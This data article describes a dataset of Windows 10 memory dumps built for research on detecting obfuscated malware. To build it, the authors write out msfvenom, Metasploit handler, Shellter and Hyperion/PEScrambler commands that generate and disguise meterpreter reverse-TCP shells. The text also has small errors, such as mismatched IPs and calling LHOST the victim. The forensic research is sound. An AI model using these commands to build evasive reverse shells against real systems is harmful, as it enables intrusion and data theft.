This article presents a dataset for studying the detection of obfuscated malware in volatile computer memory. Several obfuscated reverse remote shells were generated using Metasploit-Framework, Hyperion, and PEScrambler tools. After compromising the host, Memory snapshots of a Windows 10 virtual machine were acquired using the open-source Rekall’s WinPmem acquisition tool. The dataset is complemented by memory snapshots of uncompromised virtual machines. The data includes a reference for all running processes as well as a mapping for the designated malware running inside the memory. The datasets are available in the article, for advancing research towards the detection of obfuscated malware from volatile computer memory during a forensic analysis.

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1. Data

The dataset includes (4300 positive and 300 negatives) memory snapshots also a.k.a., memory dumps of a compromised Windows 10 virtual machine. The positive dataset consists of three groups according to the payloads employed to compromise the VM. Three groups of memory snapshots were generated based on the following penetration tests: (1) reverse meterpreter shells, (2) Shelter shells, (3) Hyperion and PEScrambler shells. Each memory snapshot is provided with a list of running processes in the system and the memory map of the malicious process.

2. Experimental design, materials, and methods

The proposed dataset aims at supporting security research that involves analyzing memory snapshots (forensic analysis). By doing so, we can have more accurate information about the applications running in the memory including the behavior of malware if present [1].
To collect these snapshots, we have used Oracle VM VirtualBox [2] with a Windows 10 host operating system to create two VMs, i.e., an attacker's machine (Kali-Linux) and a victim's machine (Windows 10). For exploiting the victim machine, we have used the open source Metasploit Framework [3].

The idea was to generate several encoded reverse shell executable payloads (32-bit) that implement a reverse TCP connection (Fig. 1). Reverse shells are very relevant in cybersecurity because they can allow an attacker to scan your network internally, install network sniffers, steal valuable information, change computer settings, including passwords and user credentials, perform DDoS attacks on other computers, and the like.

As one of the objectives of this dataset is to assess how detection techniques based on machine learning algorithms can detect obfuscated malware within a computer volatile memory. We have generated the payloads in three different steps as follows. First, we incorporated the encoding capabilities of the Metasploit framework, since the framework provides a different number of encoders for 32-bit executable payloads. Second, we re-encoded the payloads generated in 2.1 using Shellter [4]. Third, we re-encoded the payloads generated in 2.1 using Hyperion [9] and then PEScrambler [5]. We elaborate on these steps in the following sections.

2.1. Memory snapshots: metasploit encoded payloads

In this stage, we have generated the payloads using sixteen “32-bit” encoders (Table 1). Besides, for each encoder, we iterated over ten times. Hence, a total of 160 encoded payloads will be generated.

Although the framework provides other encoders, we have only selected compatible encoders and discarded non-compatible ones. Unselected encoders either yielded broken snapshots, or they did not work in the first place. We generated the payloads via a chain of commands as follows.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=4.3.2.1 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e encoder_name -i num -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o metasploit_payload.exe
```

Fig. 1. An example of a reverse TCP shell.

The chain of command was used for all encoders given in Table 1. The “shikata_ga_nai” was always used with other encoders because it is the only encoder with the rank of Excellent, a measure of reliability and stability of a module. Options used to generate the payloads are as follows:

- **-p**: What type of payload to create (in our case a meterpreter reverse TCP shell)
- **LHOST**: What IP address to connect back to
- **LPORT**: What TCP port to connect back to (in this case port 4444)
- **-f**: What file type to create (in our case windows executable)
- **-e**: The designated encoder to use (encoder_name)
- **-i**: The number of times to encode a payload (num = 1, …, 10.)
- **-o**: Where to redirect the output (in this case to a file called metasploit_payload.exe)
Once the payloads were generated, we zipped and transferred them to the victim machine. When the payload is executed on the victim machine, a meterpreter session is created between the attacker and the victim. The meterpreter session was created as follows:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.2.3.4
set LPORT 4444
set ExitOnSession false
set AutoRunScript multi_console_command -r autoruncommands.rc
exploit -j -z
run
```

Here “LHOST” represented the victim machine. The customized “autoruncommands.rc” enabled us to simulate user’s activities between both devices such as uploading files, downloading files, and taking screenshots. Once a payload was running, and a session was opened, snapshots were collected. For every payload, we collected 10 snapshots, while the time between every snapshot is between 2 and 4 minutes. To achieve this goal, we have used the windows memory acquisition tool is a.k.a., WinPmem (version: winpmem-2.1.post4) [6] This process can be performed as follows:

```
winpmem-2.1.post4 -o snapshot.aff4 -t
```

Options used to generate the memory snapshots are as follows:

- **-o**: Write the output into snapshot.aff4
- **-t**: Truncate the output file

The snapshots were stored in “advanced forensic format” (AFF4) while the size of every snapshot is approximately 1 gigabyte. The AFF4 is a compressed format and therefore for extracting any valuable information, this image should be decompressed. Although we have already decompressed all memory dumps we did not provide such decompressed files as the file of each dump separately is about 5 gigabytes. For the decompression process, the Rekall (version: Version 1.7.3.dev54: Hurricane Ridge) Memory Forensic Framework was utilized [7] This process can be performed as follows:

---

**Table 1**

| Framework Encoders | Description |
|--------------------|-------------|
| cmd/brace          | Bash Brace Expansion Command Encoder |
| cmd/echo           | Echo Command Encoder |
| cmd/generic_sh     | generic Shell Variable Substitution Command Encoder |
| cmd/ifs            | Bourne $IFS Substitution Command Encoder |
| cmd/perl           | Perl Command Encoder |
| cmd/printf_php_mq  | printf(1) via PHP magic_quotes Utility Command Encoder |
| generic/none       | The "none" Encoder |
| x86/alpha_mixed    | Alpha2 Alphanumeric Mixedcase Encoder |
| x86/alpha_upper    | Alpha2 Alphanumeric Uppercase Encoder |
| x86/bloxor         | BloXor - A Metamorphic Block Based XOR Encoder |
| x86/call4_dword_xor| Call+4 Dword XOR Encoder |
| x86/countdown      | Single-byte XOR Countdown Encoder |
| x86/fnstenv_mov    | Variable-length Fnstenv/mov Dword XOR Encoder |
| x86/jmp_call_additive| Jump/Call XOR Additive Feedback Encoder |
| x86/shikata_ga_nai | Polymorphic XOR Additive Feedback Encoder |
| x86/single_static_bit | Single Static Bit |
Following the decompression process, we extracted a list of all processes “pslist” for every image file as well as the memory map “memmap” for the employed payload (Figs. 2 and 3). These information act as labels to train the machine learning algorithm. The “pslist” is extracted as follows:

```
rekall -f snapshot.aff4 imagecopy –output-image= snapshot.aff4.img
```

Options used to extract the list of all processes and the memory map are as follows:

- `–profile=`: The name of the profile to load (in our case Win10x64_17134)
- `-f`: The raw image to load
- `–proc_regex`: A regex to select a profile by name (in our case, these names would be “payload”, “pescrambler_en”, or “shellter-paylo”).
- `&>` where to redirect the output

After validating the integrity of the memory dumps (i.e., removing any corrupted files), we ended up with 1530 AFF4 files. The folder containing these files along with their labels can be accessed at the following link: https://drive.google.com/open?id=14csgcVl_fKjLWoDk0qU7pkF7u1nRxujz.

```
rekall pslist –profile=W10x64_17134 -f snapshot.aff4.img &> pslist.txt
```

```
rekall memmap –proc_regex payload_name -f snapshot.aff4.img –profile=W10x64_17134 &> memmap.txt
```

Fig. 2. An example of a list of processes for a memory dump.

```
rekall memmap
```

Fig. 3. An example of the memory map for a payload with a process name such as “payload-x86-al”.
2.2. Memory snapshots: “Shellter” metasploit encoded payloads

Here the payloads generated in 2.1 were re-encoded using “Shellter”. It is a dynamic, shellcode injection tool. It can be used to inject shellcode into native Windows applications (32-bit only). “It takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with read, write, and execute access, and whatever would look dodgy under an AV scan”. We re-encoded Metasploit encoded payloads as follows:

```
wine shellter.exe -a -s -p meterpreter_reverse_tcp -lhost 4.3.2.1 -port 4444 -f metasploit_payload.exe
```

Where “-a” refers to an auto mode, “-s” refers to a stealth mode. The auto mode enables Shellter to apply its own encoding. The encoding engine will use a random amount of “XOR”, “ADD”, “SUB”, or “NOT” operation. The stealth mode feature preserves the original functionality of the application while it keeps all the benefits of dynamic PE infection. We followed the same steps mentioned in 2.1 to obtain the memory snapshots. After validating the integrity of the memory dumps, we ended up with 1520 AFF4 files. The folder containing these files along with their labels can be accessed at the following link: https://drive.google.com/open?id=1MNDg7ntEY3k7wflPLxQd6y9vHG7aZro-Q.

2.3. Memory snapshots: “Hyperion & PEScrambler” metasploit encoded payloads

Here the payloads generated in 2.1 were re-encoded using “Hyperion” and then PEScrambler. Hyperion tool is a runtime crypter that can transform a Windows portable executables (PE) into an encrypted version that decrypts itself on startup and executes its original content. PEScrambler is a tool to obfuscate win32 binaries automatically [8] It can relocate portions of the code and protect them with anti-disassembly code. It also defeats static program flow analysis by re-routing all function call through a central dispatcher function [8] The re-encoding commands are performed as follows:

```
Options used to generate the obfuscated payload are as follows:

wine hyperion.exe hyperion_payload.exe metasploit_payload.exe
wine Pescrambler.exe -i hyperion_payload.exe -o pescrambler_payload.exe
```

- -i: Specify an executable input file (hyperion_payload.exe)
- -o: Specify an output executable file (pescrambler_payload.exe)

After validating the integrity of the memory dumps, we ended up with 1250 AFF4 files. The folder containing these files along with their labels can be accessed at the following link: https://drive.google.com/open?id=1gYA7Wy2Y6MC5WyKl9_Q1uyPRnn0iuifmM.

At last, the negative snapshots were collected with only trusted applications were only running in the memory. The folder containing these files along with their labels can be accessed at the following link: https://drive.google.com/open?id=1J7T4ZRWChElkBklL4bqOlZeLoNGN.

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Conflict of Interest

The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.
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